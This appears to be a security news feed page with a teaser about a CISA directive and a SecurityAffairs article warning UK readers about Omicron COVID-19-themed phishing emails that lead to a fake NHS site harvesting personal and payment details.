Why Everyone Needs to Take the Latest CISA Directive Seriously

3 December 2021 at 09:23
Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But in the case of the latest CISA directive, that would be a mistake. In this article, we explain why

Watch out for Omicron COVID-19-themed phishing messages!

3 December 2021 at 08:45

Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns.

Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing attacks.

People are interested in the spread of the new variant, the effectiveness of the vaccines, and the measures that states will adopt to prevent its spread, and threat actors are attempting to take advantage of this situation.

An Omicron COVID-19-themed campaign was spotted by UK authorities, and the National Health Service (NHS) is warning about these phishing attacks.

⚠ SCAM OMICRON PCR EMAILS ⚠

Beware of fake NHS emails asking you to order a Omicron PCR test.

Link goes to a fake NHS website.

The NHS will:

❌NEVER ask for payment – the vaccine is free
❌NEVER ask for your bank details

Forward emails to [email protected] pic.twitter.com/GcGB3C5dLI

— Norfolk County Council Trading Standards (@NorfolkCCTS) November 30, 2021

@ukhsa advise of a #SCAM doing the rounds on social media purporting to offer #Omicron #PCRs #tscovid19

This has been reported & will be taken down but it is likely there will be more instances before it is removed, & there are reports of people querying it at test sites. pic.twitter.com/IXZ1qPStq5

— Dudley EHO – Play your part – #protectDudley (@myDudleyEHO) December 1, 2021

These phishing messages offer a free Omicron PCR test that will allegedly allow recipients to avoid restrictions. One of the samples shared by the UK's consumer protection organization ‘Which?’ and published by BleepingComputer was sent from the email address ‘[email protected]’ in an attempt to make the message look more credible.

Upon clicking the link embedded in the message, recipients are redirected to a fake NHS website where they can apply for a “COVID-19 Omicron PCR test.”

Recipients have to fill in a form with their personal data (name, date of birth, home address, mobile phone number, and email address), answer some security questions (e.g. mother's maiden name), and finalize the procedure by making a payment of £1.24 ($1.65).

Clearly, the scammers aim to steal the recipients' payment card details when that payment is made.

Authorities are urging citizens to be wary of suspicious emails or text messages asking for financial details (i.e. credit card or banking data). The NHS never asks for financial details in legitimate email correspondence.

“The NHS will: NEVER ask for payment – the vaccine is free. NEVER ask for your bank details.”

Users who receive suspicious messages can report them to “[email protected]”.


Pierluigi Paganini

(SecurityAffairs – hacking, Omicron COVID-19)

